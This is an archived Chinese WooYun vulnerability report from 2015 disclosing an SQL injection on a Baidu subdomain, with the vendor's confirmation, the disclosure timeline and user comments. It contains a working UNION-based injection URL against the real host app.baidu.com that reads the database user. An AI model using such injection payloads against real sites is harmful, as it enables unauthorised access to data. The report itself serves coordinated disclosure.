百度某分站SQL注射

编号98706
Urlhttp://www.wooyun.org/bug.php?action=view&id=98706
漏洞状态厂商已经确认
漏洞标题百度某分站SQL注射
漏洞类型SQL注射漏洞
厂商百度
白帽子Jannock
提交日期2015-02-28 11:17:00
公开日期2015-04-14 11:18:00
修复时间(not set)
确认时间2015-02-28 00:00:00
Confirm Spend0
漏洞标签php+字符类型注射
关注数0
收藏数0
白帽评级
白帽自评rank20
厂商评级
厂商评rank12
漏洞简介
百度某分站SQL注射,支持union
漏洞细节

不多说了,要登陆。
http://app.baidu.com/game?action=claimlist&m=search&app_name=a' union select 1,2,3,4,user(),6,7,8,9,0,1,2,3,4,5%23

POC

1.png

修复方案

过滤

状态信息 2015-02-28: 细节已通知厂商并且等待厂商处理中
2015-02-28: 厂商已经确认,细节仅向厂商公开
2015-03-10: 细节向核心白帽子及相关领域专家公开
2015-03-20: 细节向普通白帽子公开
2015-03-30: 细节向实习白帽子公开
2015-04-14: 细节向公众公开
厂商回复感谢提交,已通知业务部门处理
回应信息危害等级:高漏洞Rank:12 确认时间:2015-02-28 16:36
Showing 1-7 of 7 items.
评论内容评论人点赞数评论时间

一哥6666

小丽02015-09-16 16:36:00

@U神你是王雪?

sql小神02015-05-25 10:36:00

一哥bat。

老笨蛋02015-02-28 21:31:00

我默默的关注了

hkAssassin02015-02-28 18:00:00

一哥总是喜欢搞百度,新浪,腾讯,其它垃圾网站就不搞的

U神02015-02-28 12:41:00

一哥始终是一哥

he1renyagao02015-02-28 11:26:00

又杀到百度这里来了

明月影02015-02-28 11:23:00